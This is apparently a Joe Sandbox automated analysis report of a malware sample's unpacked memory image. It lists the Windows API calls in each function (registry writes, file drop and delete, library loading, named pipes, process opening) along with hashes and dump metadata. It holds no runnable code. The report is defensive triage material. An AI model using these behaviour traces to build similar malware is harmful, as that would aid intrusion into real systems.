lstrcmpiW.KERNEL32(0075F7F1,?,?,0075F7F1,00000000,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757C56
lstrlenW.KERNEL32(?,?,0075F7F1,00000000,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757C67
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00757CA1
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757CC3
RegCloseKey.ADVAPI32(?,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757CCC
RtlEnterCriticalSection.NTDLL(00000000), ref: 00757CE2
HeapFree.KERNEL32(00000000,?,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757CF7
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00757D0B
HeapFree.KERNEL32(00000000,0075F7F1,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757D20
RegCloseKey.ADVAPI32(?,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757D29

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
String ID:
API String ID: 534682438-0
Opcode ID: 46e2e53eec0b34c84b9905759d51d5ec47aae1d56b75265f2c1957715bbbeef9
Instruction ID: a9b9c843dfd87987e0d01e59a80cbd0ca417bbd26ed3e39d7b55f357c9aad1c2
Opcode Fuzzy Hash: 46e2e53eec0b34c84b9905759d51d5ec47aae1d56b75265f2c1957715bbbeef9
Instruction Fuzzy Hash: B9316E71600108FFDB119FA4EC88DEE7FBAFB48381B148065F909D6130D77A8A99DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00757C03 Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00757C27

Part of subcall function 007603AF: RegCloseKey.ADVAPI32(?,?,0075F6FE,00000000,00000000,?), ref: 00760436

lstrcmpiW.KERNEL32(0075F7F1,?,?,0075F7F1,00000000,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757C56
lstrlenW.KERNEL32(?,?,0075F7F1,00000000,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757C67
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00757CA1
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757CC3
RegCloseKey.ADVAPI32(?,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757CCC
RtlEnterCriticalSection.NTDLL(00000000), ref: 00757CE2
HeapFree.KERNEL32(00000000,?,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757CF7
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00757D0B
HeapFree.KERNEL32(00000000,0075F7F1,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757D20
RegCloseKey.ADVAPI32(?,?,?,?,0075F7F1,00000000,00000001,00000000), ref: 00757D29

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
String ID:
API String ID: 534682438-0
Opcode ID: 9f937d3fcd4ed2a10e452637adadf0e67becd79c783fec98a1fc25088b718554
Instruction ID: f8e33daf100c0d08bf8f1da49a5934b7a26aed76c333555d5cc0cb35ef0e9f1b
Opcode Fuzzy Hash: 9f937d3fcd4ed2a10e452637adadf0e67becd79c783fec98a1fc25088b718554
Instruction Fuzzy Hash: D2315D71600208FFDB119FA4EC88DEE7BBEFB48381B148065F909D6130D7798A95DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00770EC8 Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00770EDF
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0076A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0075C1CF,00000000), ref: 00770EF1
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0076A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0075C1CF,00000000), ref: 00770EFE
wsprintfA.USER32 ref: 00770F19
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000094,00000000,?,0075C1CF,00000000), ref: 00770F2F
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 00770F48
WriteFile.KERNEL32(00000000,00000000), ref: 00770F50
GetLastError.KERNEL32 ref: 00770F5E
CloseHandle.KERNEL32(00000000), ref: 00770F67
GetLastError.KERNEL32(?,00000000,?,0076A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0075C1CF,00000000), ref: 00770F78
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0076A79B,00000000,00000094,00000001,00000000,00000094,00000000,?,0075C1CF,00000000), ref: 00770F88

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID:
API String ID: 3873609385-0
Opcode ID: 17cd2cbc8208b7db28cc069536a1c0432cd94aab7b73196f60d971c08df924db
Instruction ID: 705095f0b3eedc9c0b5679bb7265b3d957ddbe48fdd4509a99ed2bb849d44a12
Opcode Fuzzy Hash: 17cd2cbc8208b7db28cc069536a1c0432cd94aab7b73196f60d971c08df924db
Instruction Fuzzy Hash: 0311D571244218FFE6212B64AC8CF7B3A5DEB423D9B008125F90ED1150DA2C4E85D6BA

Uniqueness

Uniqueness Score: -1.00%

Function 00758C0A Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 191stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,03F09989,?,?,03F09989,?,?,03F09989,?,?,03F09989,?), ref: 00758D08
lstrcpyW.KERNEL32(00000000,?), ref: 00758D2B
lstrcatW.KERNEL32(00000000,00000000), ref: 00758D33
lstrlenW.KERNEL32(00000000,?,03F09989,?,?,03F09989,?,?,03F09989,?,?,03F09989,?,?,03F09989,?), ref: 00758D7E
memcpy.NTDLL(00000000,?,?,?), ref: 00758DE6
LocalFree.KERNEL32(?,?), ref: 00758DFF

Strings

f*w, xrefs: 00758D4D, 00758D57
%w, xrefs: 00758D40
P, xrefs: 00758C83

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P$f*w$%w
API String ID: 3649579052-2738075566
Opcode ID: fae6dbd45ec7f514c87671bc9fa4a8878bd2522186eacdf2aea40d96ae092b9f
Instruction ID: 0fbb920a1bce8a37d4392b501b2624ca73bff5dfc4f7e48c39c82821865e1e74
Opcode Fuzzy Hash: fae6dbd45ec7f514c87671bc9fa4a8878bd2522186eacdf2aea40d96ae092b9f
Instruction Fuzzy Hash: D761717190020DEFDF519FA4CC89CEE7BB9EB45341B148065F908A7221DBBC9D49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00760098 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?), ref: 007600F3
GetLastError.KERNEL32 ref: 00760119
SetEvent.KERNEL32(00000000), ref: 0076012C
GetModuleHandleA.KERNEL32(00000000), ref: 00760175
memset.NTDLL ref: 0076018A
RtlExitUserThread.NTDLL(?), ref: 007601BF

Strings

x(w, xrefs: 0076017D
d(w, xrefs: 0076010A
P(w, xrefs: 0076015D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HandleModule$ErrorEventExitLastThreadUsermemset
String ID: P(w$d(w$x(w
API String ID: 3978817377-2671211930
Opcode ID: df8eaf7db4c76529c1a1f9dad0f0dbad80f85f2212ca190f2753c9c97cca24b6
Instruction ID: ef3b6f75f723192b7dd44a8f7489820497cd1412d23f99d85aef33a0d8293e0c
Opcode Fuzzy Hash: df8eaf7db4c76529c1a1f9dad0f0dbad80f85f2212ca190f2753c9c97cca24b6
Instruction Fuzzy Hash: C0416C70900608EFCB258F68DC8896FBBBAFF463507648559E80BD2110D7389E44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076B7BF Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F0CBB8,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0076B7E2
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0076B7F1
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0076B7FE
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0076B816
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0076B822
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076B83E
wsprintfA.USER32 ref: 0076B920
memcpy.NTDLL(00000000,?,?), ref: 0076B96D
InterlockedExchange.KERNEL32(00778148,00000000), ref: 0076B98B
HeapFree.KERNEL32(00000000,00000000), ref: 0076B9CC

Part of subcall function 0075EE4A: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0075EE73
Part of subcall function 0075EE4A: memcpy.NTDLL(00000000,?,?), ref: 0075EE86
Part of subcall function 0075EE4A: RtlEnterCriticalSection.NTDLL(00778448), ref: 0075EE97
Part of subcall function 0075EE4A: RtlLeaveCriticalSection.NTDLL(00778448), ref: 0075EEAC
Part of subcall function 0075EE4A: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0075EEE4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 4198405257-0
Opcode ID: c1421ae2ba2d6fcbf869436c16651427299e1d92710a38ffa25b717e39e26ce5
Instruction ID: 6df045c722c56028405e62d2218171560dcebf1a72027079216bafda80ad12af
Opcode Fuzzy Hash: c1421ae2ba2d6fcbf869436c16651427299e1d92710a38ffa25b717e39e26ce5
Instruction Fuzzy Hash: 9B616E7190020AEFDF11DFA4DC88EAA7BA9EB45384F048069E909D7211D778AA85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0076100C Relevance: 15.1, APIs: 10, Instructions: 109librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076102C
TlsAlloc.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 00761036
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076105F
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076106D
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076107B
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 00761089
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 00761097
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 007610A5
___HrLoadAllImportsForDll@4.DELAYIMP ref: 007610CF
HeapFree.KERNEL32(00000000,?,0000000C,00000000,?,?,00000000,?,?,0075DA8B,?), ref: 0076114A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Load$Library$AllocDll@4FreeHeapImports
String ID:
API String ID: 1792504554-0
Opcode ID: 99ff794e7dbe62d03e3330732a1fe996f2fd6093780300f8cd2c25ddb2e30b3c
Instruction ID: 3305969e923a63a95b804694f3291b0864946372a8f47c776c5cb985c8f55aee
Opcode Fuzzy Hash: 99ff794e7dbe62d03e3330732a1fe996f2fd6093780300f8cd2c25ddb2e30b3c
Instruction Fuzzy Hash: 2441917190010CEFDB00DFA8DC8CD5977EDBB09390B5485AAE60DDB211DA3CAE86CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00765BE4 Relevance: 15.1, APIs: 10, Instructions: 97filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00761884: memset.NTDLL ref: 007618A6
Part of subcall function 00761884: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00761950

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00765C2C
CloseHandle.KERNEL32(?), ref: 00765C38
PathFindFileNameW.SHLWAPI(?), ref: 00765C48
lstrlenW.KERNEL32(00000000), ref: 00765C51
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00765C62
wcstombs.NTDLL ref: 00765C71
lstrlen.KERNEL32(?), ref: 00765C7E
UnmapViewOfFile.KERNEL32(?,?,?,00000000,?), ref: 00765CBB
HeapFree.KERNEL32(00000000,00000000), ref: 00765CCE
DeleteFileW.KERNEL32(?), ref: 00765CDB

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 7f0156b2d8c1e1ff2e959de58f91d5ed831a75496b3dcb59e8574e20bcfdb7c6
Instruction ID: 9c6766b852a1689c82ff9dc65db03e72e0373d92990057faca65b84734853844
Opcode Fuzzy Hash: 7f0156b2d8c1e1ff2e959de58f91d5ed831a75496b3dcb59e8574e20bcfdb7c6
Instruction Fuzzy Hash: DE313A31600609EBDB129FA5ED48D9F7B79FF85391F008025FD0AA2120DB398A54EB65

Uniqueness

Uniqueness Score: -1.00%

Function 0075F425 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0075F435
CreateFileW.KERNEL32(0076A5EC,80000000,00000003,00778208,00000003,00000000,00000000,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F452
GetLastError.KERNEL32(?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F4FA

Part of subcall function 007549F2: lstrlen.KERNEL32(?,00000000,?,00000027), ref: 00754A28
Part of subcall function 007549F2: lstrcpy.KERNEL32(00000000,00000000), ref: 00754A4C
Part of subcall function 007549F2: lstrcat.KERNEL32(00000000,00000000), ref: 00754A54

GetFileSize.KERNEL32(0076A5EC,00000000,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F485
CreateFileMappingA.KERNEL32(0076A5EC,00778208,00000002,00000000,00000000,0076A5EC), ref: 0075F499
lstrlen.KERNEL32(0076A5EC,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F4B5
lstrcpy.KERNEL32(?,0076A5EC), ref: 0075F4C5
GetLastError.KERNEL32(?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F4CD
HeapFree.KERNEL32(00000000,0076A5EC,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F4E0
CloseHandle.KERNEL32(0076A5EC,?,0076A5EC), ref: 0075F4F2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID:
API String ID: 194907169-0
Opcode ID: 851f98a1eda35f4868ab6b4793c9788346f224ec82da9936de4969ab0bf4f60c
Instruction ID: d7c2e19c30764f985107019937ce01bbdecdd1c72dc2c70a653efdc8a5423111
Opcode Fuzzy Hash: 851f98a1eda35f4868ab6b4793c9788346f224ec82da9936de4969ab0bf4f60c
Instruction Fuzzy Hash: 2B212B71900208FFDB109FA4DC48A9EBFBAFB04395F10C469F919E6260D7784A85EB55

Uniqueness

Uniqueness Score: -1.00%

Function 0076875D Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,0076EDFC), ref: 00768772

Part of subcall function 00763F46: InterlockedExchange.KERNEL32(?,000000FF), ref: 00763F4D

WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,0076EDFC), ref: 00768792
CloseHandle.KERNEL32(00000000,?,0076EDFC), ref: 0076879B
CloseHandle.KERNEL32(00000000,?,?,0076EDFC), ref: 007687A5
RtlEnterCriticalSection.NTDLL(?), ref: 007687AD
RtlLeaveCriticalSection.NTDLL(?), ref: 007687C5
Sleep.KERNEL32(000001F4), ref: 007687D4
CloseHandle.KERNEL32(?), ref: 007687E1
LocalFree.KERNEL32(?), ref: 007687EC
RtlDeleteCriticalSection.NTDLL(?), ref: 007687F6

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: e4a54ddf5c1c5eccc6b93fcd9d329fc9bd0f6f23969f15e7f7460e02c51ffa95
Instruction ID: 8afdd01a76f4dedc73c6c6b34f0ca128abf98c6fc3d510c18c83b857168b43ee
Opcode Fuzzy Hash: e4a54ddf5c1c5eccc6b93fcd9d329fc9bd0f6f23969f15e7f7460e02c51ffa95
Instruction Fuzzy Hash: 36119E31100716EFCB606BB5DC8895AB7BAFF047907648A14FA8793520CF3DE980DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0076CE46 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 148timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00754DA2: InterlockedIncrement.KERNEL32(?), ref: 00754DF3
Part of subcall function 00754DA2: RtlLeaveCriticalSection.NTDLL ref: 00754E7E

OpenProcess.KERNEL32(00000410,FD189D89,00769026,00000000,0000001C,00000000,00000000,?,?,?,00769026), ref: 0076CEA0
CloseHandle.KERNEL32(00000000,00000000,00000000,00769036,00000104,?,?,?,00769026), ref: 0076CEBE
GetSystemTimeAsFileTime.KERNEL32(00769026), ref: 0076CF26
lstrlenW.KERNEL32(00800014), ref: 0076CF9B
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0076CFB7
memcpy.NTDLL(00000014,00800014,00000002), ref: 0076CFCF

Part of subcall function 0076EC2D: RtlLeaveCriticalSection.NTDLL(?), ref: 0076ECAA

Strings

o, xrefs: 0076CF8C
`'w, xrefs: 0076CF3B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: `'w$o
API String ID: 2541713525-531559533
Opcode ID: 316599b7ff6f5fbf7a18fe3a95252a24950e3f92d6ec2c4132ec5886d8064a4b
Instruction ID: 791c4ac981976f5a0a2e4726a25bebdbf68cbf92073a02cd56a473c19aaa11ad
Opcode Fuzzy Hash: 316599b7ff6f5fbf7a18fe3a95252a24950e3f92d6ec2c4132ec5886d8064a4b
Instruction Fuzzy Hash: 1A51A072640706EFD721DF64C888BA6B7B9FF04345F004529E94AD7250D778ED84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00768D03 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,?,0075347D,?,00000001,?,?,?), ref: 00768D1A
lstrlen.KERNEL32(?), ref: 00768D2A
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00768D5E
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00768D89
memcpy.NTDLL(00000000,?,?), ref: 00768DA8
HeapFree.KERNEL32(00000000,00000000), ref: 00768E09
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00768E2B

Strings

W, xrefs: 00768E57

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: 91097e0892bfa7a97af01b7a2e8d38e82da720122ae781e6e94a60bee31ef577
Instruction ID: b141a1b9940dbf956bd38f571ddc8580562459cd511850cc79344fb32269f1e1
Opcode Fuzzy Hash: 91097e0892bfa7a97af01b7a2e8d38e82da720122ae781e6e94a60bee31ef577
Instruction Fuzzy Hash: 38416D7190020AEFDF11CF54DC84AAE7BB9FF04344F148565ED0997211EB3A9A54DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0075DABC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C
Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
Part of subcall function 0076E52A: GetCurrentThreadId.KERNEL32 ref: 0076E562
Part of subcall function 0076E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
Part of subcall function 0076E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
Part of subcall function 0076E52A: lstrcpy.KERNEL32(00000000), ref: 0076E59E

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0075DB06
StrTrimA.SHLWAPI(?,?), ref: 0075DB29
StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 0075DB92
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 0075DBB5
DeleteFileA.KERNEL32(?,?,00000015,00003219), ref: 0075DBDE
HeapFree.KERNEL32(00000000,?), ref: 0075DBF0
HeapFree.KERNEL32(00000000,?,00003219), ref: 0075DC01

Strings

9"w, xrefs: 0075DAF4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID: 9"w
API String ID: 1078934163-3173557682
Opcode ID: c265b5c4842ad1c51991103cbe3d787947b0235790862420c8a99819359e8738
Instruction ID: 977db6410331c7a4cfb26051b8562c00f0c270d6816f66ca7d8c6416739ab5a1
Opcode Fuzzy Hash: c265b5c4842ad1c51991103cbe3d787947b0235790862420c8a99819359e8738
Instruction Fuzzy Hash: 2741AC71104306AFE721DF64DC08FAA77E9FB44781F004419FA48961A1EB7CDD89CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00760EDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00753A9F,00000000,?,?,?,?,00753A9F,00000035,00000000,?,00000000), ref: 00760F0C
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00760F22
memcpy.NTDLL(00000010,00753A9F,00000000,?,?,00753A9F,00000035,00000000), ref: 00760F58
memcpy.NTDLL(00000010,00000000,00000035,?,?,00753A9F,00000035), ref: 00760F73
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00760F91
GetLastError.KERNEL32(?,?,00753A9F,00000035), ref: 00760F9B
HeapFree.KERNEL32(00000000,00000000,?,?,00753A9F,00000035), ref: 00760FBE

Strings

(, xrefs: 00760FA5

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 201d71617cd32b096fdd2cd9a182682bca320751b6aa43b633dad4decfb467a1
Instruction ID: 5f1d9e31c9c2c0cc480feba3943df9d5a0a4d4fe7b551d98e08406d7f6a5c10b
Opcode Fuzzy Hash: 201d71617cd32b096fdd2cd9a182682bca320751b6aa43b633dad4decfb467a1
Instruction Fuzzy Hash: 1F318135500309EFDB21CFA4EC48AEBBBB9FB04790F108429FD4AD2250D7389A55DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00752C75 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 00752C90
RegCloseKey.ADVAPI32(?), ref: 00752D48

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

LoadLibraryA.KERNEL32(00000000), ref: 00752CDE
GetProcAddress.KERNEL32(00000000,?), ref: 00752CF7
GetLastError.KERNEL32 ref: 00752D16
FreeLibrary.KERNEL32(00000000), ref: 00752D28
GetLastError.KERNEL32 ref: 00752D30

Strings

Software\Microsoft\WAB\DLLPath, xrefs: 00752C81

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath
API String ID: 1628847533-3156921957
Opcode ID: 01750fe16e0c476900c0a5d5f51eb1907ab86bb1b8a8b3564126a40b111c248e
Instruction ID: 445e0098f0ce24a293727a8928c5a9bccb30a0d10cd390ad565564ba9faf2ab3
Opcode Fuzzy Hash: 01750fe16e0c476900c0a5d5f51eb1907ab86bb1b8a8b3564126a40b111c248e
Instruction Fuzzy Hash: 6B21C771A04318FFCB116BA4DC48CEEBB79FB95392B104165FC05E7121E6B94E46DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007598F5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 0075990B
lstrcmpiW.KERNEL32(00000000,?), ref: 00759943
lstrcmpiW.KERNEL32(?,?), ref: 00759958
lstrlenW.KERNEL32(?), ref: 0075995F
CloseHandle.KERNEL32(?), ref: 00759987
DeleteFileW.KERNEL32(?,?,?,?), ref: 007599B3
RtlLeaveCriticalSection.NTDLL(00000000), ref: 007599D1

Strings

%"w, xrefs: 00759975

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID: %"w
API String ID: 1496873005-2819948454
Opcode ID: 1be472bd47821748f7bccf4d6a70ae1bf024f0a7a6026c926122c27a23be6a46
Instruction ID: f2d206aed9a1f1ffe94247e34b0a695b50e77727a52065a11d5d6498713d330e
Opcode Fuzzy Hash: 1be472bd47821748f7bccf4d6a70ae1bf024f0a7a6026c926122c27a23be6a46
Instruction Fuzzy Hash: 7D214C71600309FFDB209BA5DC88EAE77BDEF44386B044529B906D2111DBBCEE49DB64

Uniqueness

Uniqueness Score: -1.00%

